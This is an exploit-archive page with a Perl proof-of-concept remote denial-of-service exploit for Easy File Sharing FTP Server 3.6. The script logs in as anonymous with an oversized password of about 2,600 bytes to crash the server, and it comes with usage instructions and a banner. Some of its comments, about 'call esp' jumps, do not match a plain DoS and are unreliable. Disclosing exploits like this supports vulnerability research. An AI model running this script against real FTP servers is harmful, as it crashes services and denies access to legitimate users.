Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]
- Easy File Sharing FTP 3.6 Denial Of Service[6]
- Authored by Fernando Mengali[7]
-
Easy File Sharing FTP version 3.6 remote denial of service exploit.
- SHA-256 |
5111fc74e92e1ad74c63ec7bec89bc96ab930b546e17d77beff6a0850a8d22cd
- Download[8] | Favorite[9] | View[10]
Change Mirror[11] Download[12]
#!/usr/bin/perl
use Net::FTP;
# Exploit Title: Easy File Sharing FTP Server 3.6 - Denial of Service (DoS)
# Discovery by: Fernando Mengali
# Discovery Date: 17 january 2024
# Vendor Homepage: N/A
# Download to demo:
# Notification vendor: No reported
# Tested Version: Easy File Sharing FTP Server 3.6
# Tested on: Window XP Professional - Service Pack 2 and 3 - English
# Vulnerability Type: Denial of Service (DoS)
# Vídeo: https://www.youtube.com/watch?v=U2svu2FiIVc
#1. Description
#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).
#For this exploit I have tried several strategies to increase reliability and performance:
#Jump to a static 'call esp'
#Backwards jump to code a known distance from the stack pointer.
#The server does not correctly handle the amount of data or bytes of the password entered by the user.
#When authenticating to the FTP server with a long password or a password with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.
#2. Proof of Concept - PoC
$sis="$^O";
if ($sis eq "windows"){
$cmd="cls";
} else {
$cmd="clear";
}
system("$cmd");
intro();
main();
print "[+] Exploiting... \n";
my $payload = "\x2c";
$payload .= "A"x2000;
$payload .= "\x41"x610;
my $ftp = Net::FTP->new($ip, Debug => 0) or die "Não foi possível se conectar ao servidor: $@";
$ftp->login("anonymous",$payload) or die "[+] Possibly exploited!";
$ftp->quit;
print "[+] Done - Exploited success!!!!!\n\n";
sub intro {
print "######################################################################\n";
print "# Easy File Sharing FTP Server 3.6 - Denied of Service #\n";
print "# #\n";
print "# Coded by Fernando Mengali #\n";
print "# #\n";
print "# e-mail: fernando.mengalli\@gmail.com #\n";
print "# #\n";
print "######################################################################\n";
}
sub main {
our ($ip, $port) = @ARGV;
unless (defined($ip) && defined($port)) {
print " \nUsage: $0 <ip> <port> \n";
exit(-1);
}
}
#3. Solution/ How to fix:
# This version product is deprecated
File Tags
- ActiveX[18] (932)
- Advisory[19] (83,747)
- Arbitrary[20] (16,481)
- BBS[21] (2,859)
- Bypass[22] (1,805)
- CGI[23] (1,031)
- Code Execution[24] (7,474)
- Conference[25] (685)
- Cracker[26] (843)
- CSRF[27] (3,365)
- DoS[28] (24,166)
- Encryption[29] (2,375)
- Exploit[30] (52,413)
- File Inclusion[31] (4,239)
- File Upload[32] (982)
- Firewall[33] (822)
- Info Disclosure[34] (2,817)
- Intrusion Detection[35] (900)
- Java[36] (3,092)
- JavaScript[37] (883)
- Kernel[38] (6,879)
- Local[39] (14,613)
- Magazine[40] (586)
- Overflow[41] (12,923)
- Perl[42] (1,428)
- PHP[43] (5,164)
- Proof of Concept[44] (2,357)
- Protocol[45] (3,673)
- Python[46] (1,579)
- Remote[47] (31,151)
- Root[48] (3,609)
- Rootkit[49] (517)
- Ruby[50] (614)
- Scanner[51] (1,646)
- Security Tool[52] (7,941)
- Shell[53] (3,221)
- Shellcode[54] (1,216)
- Sniffer[55] (898)
- Spoof[56] (2,233)
- SQL Injection[57] (16,464)
- TCP[58] (2,419)
- Trojan[59] (687)
- UDP[60] (896)
- Virus[61] (667)
- Vulnerability[62] (32,256)
- Web[63] (9,806)
- Whitepaper[64] (3,763)
- x86[65] (966)
- XSS[66] (18,085)
- Other[67]
File Archives
- January 2024[68]
- December 2023[69]
- November 2023[70]
- October 2023[71]
- September 2023[72]
- August 2023[73]
- July 2023[74]
- June 2023[75]
- May 2023[76]
- April 2023[77]
- March 2023[78]
- February 2023[79]
- Older[80]
Systems
- AIX[81] (429)
- Apple[82] (2,049)
- BSD[83] (375)
- CentOS[84] (57)
- Cisco[85] (1,926)
- Debian[86] (6,945)
- Fedora[87] (1,693)
- FreeBSD[88] (1,246)
- Gentoo[89] (4,421)
- HPUX[90] (880)
- iOS[91] (366)
- iPhone[92] (108)
- IRIX[93] (220)
- Juniper[94] (69)
- Linux[95] (48,212)
- Mac OS X[96] (691)
- Mandriva[97] (3,105)
- NetBSD[98] (256)
- OpenBSD[99] (487)
- RedHat[100] (14,827)
- Slackware[101] (941)
- Solaris[102] (1,611)
- SUSE[103] (1,444)
- Ubuntu[104] (9,219)
- UNIX[105] (9,352)
- UnixWare[106] (187)
- Windows[107] (6,619)
- Other[108]
- Services
- Security Services[119]
- Hosting By
- Rokasec[120]